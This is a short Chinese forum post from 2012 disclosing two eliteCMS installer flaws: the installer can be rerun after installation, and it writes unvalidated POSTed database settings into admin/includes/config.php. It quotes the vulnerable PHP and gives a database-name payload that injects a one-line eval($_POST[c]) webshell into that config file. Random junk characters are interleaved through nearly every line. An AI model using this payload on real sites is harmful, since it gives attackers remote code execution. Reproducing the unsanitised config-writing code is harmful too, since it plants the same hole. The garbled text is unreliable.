eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装+ u5 y) T I% v1 g3 s; y! `
% |! h; b' E0 l: B6 d& c
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
- X4 C! R: o- a* r# a我们来看代码:
" S" w6 | {- c4 m 0 c1 Z2 V+ r+ w! o& a/ A: E
...0 A& A" g- ]: s6 U- ?
elseif ($_GET['step'] == "4") {
. R( d; R# E7 |. O $file = "../admin/includes/config.php";
: G' A. s% Z) B; b6 S' ` D $write = "<?php\n";+ ?' O; e' C3 m5 z% D" n
$write .= "/**\n";
# }* \; g' y" B1 u, Y8 }2 i $write .= "*\n";
9 {, l6 b$ V$ u6 s. \' c9 ~: r $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
) Q- Y( \/ Z5 T4 b( {...略...8 ^) M% S9 A+ j1 ]2 K
$write .= "*\n";9 U, k# S3 X6 r* t4 _! b
$write .= "*/\n";
# K7 G8 V& b) ~5 W $write .= "\n";
: A* [/ m! A' M, R $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";+ d+ y# [- m9 C. ^; P
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";$ j( ~/ F6 ?& u! H: f" k& b* G
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";' n8 `& i, b- X5 A8 W
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
9 A" U# M$ }* X5 Q- p $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% N) i$ o4 M! n; c1 S9 b) g
$write .= "if (!\$connection) {\n";; g4 l. F2 S0 Z. S' K
$write .= " die(\"Database connection failed\" .mysql_error());\n";
. M2 p: W& D0 i1 r% I% o" u $write .= " \n";
0 A* F- r7 K& L/ h $write .= "} \n";
' C. H O% s4 u& w. I+ J3 M( a0 P $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
8 q8 P" c, ?* n7 T+ z1 z" ^ a $write .= "if (!\$db_select) {\n";
2 Q9 ^' T1 B! r2 i/ j $write .= " die(\"Database select failed\" .mysql_error());\n";
5 {1 E! i5 a; K4 e# i $write .= " \n";
' C% X# [% l8 j4 N# b3 e6 z $write .= "} \n";& A7 a+ e1 d4 H
$write .= "?>\n";5 P' U; e- O5 e" h6 J
9 [; V5 E! I ~( e. r $writer = fopen($file, 'w');
5 I% ^: `2 x, p" o...; y$ n3 E6 _/ ^, z9 V/ b
3 B& o! X P# w& G9 r
在看代码:
# G6 T/ k: [' ]6 T) c$ g; i; } l s
0 l# {% {7 z; z4 p$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
5 q* p$ W* B: C7 g9 L. M: \$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
% l( ~1 t9 A% s9 d3 M$ b$_SESSION['DB_USER'] = $_POST['DB_USER'];0 B1 P( m' X; y6 k2 d4 J2 o1 w
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
& j# `; @( q; w( a: N : f# g8 K7 q m
取值未作任何验证
5 A3 @- J+ a: f7 C5 K& T- r: {如果将数据库名POST数据:6 h, f! }+ k; U+ e- u
4 A# b0 A9 _8 }# f* P5 Q- C"?><?php eval($_POST[c]);?><?php
1 `: b4 j" ?0 f* k, @
: M, I3 h2 E" o ?: x' w将导致一句话后门写入/admin/includes/config.php
5 y' ~- |* e. N3 V! h# A |
发表于 2012-11-18 13:59:27
收藏
支持
反对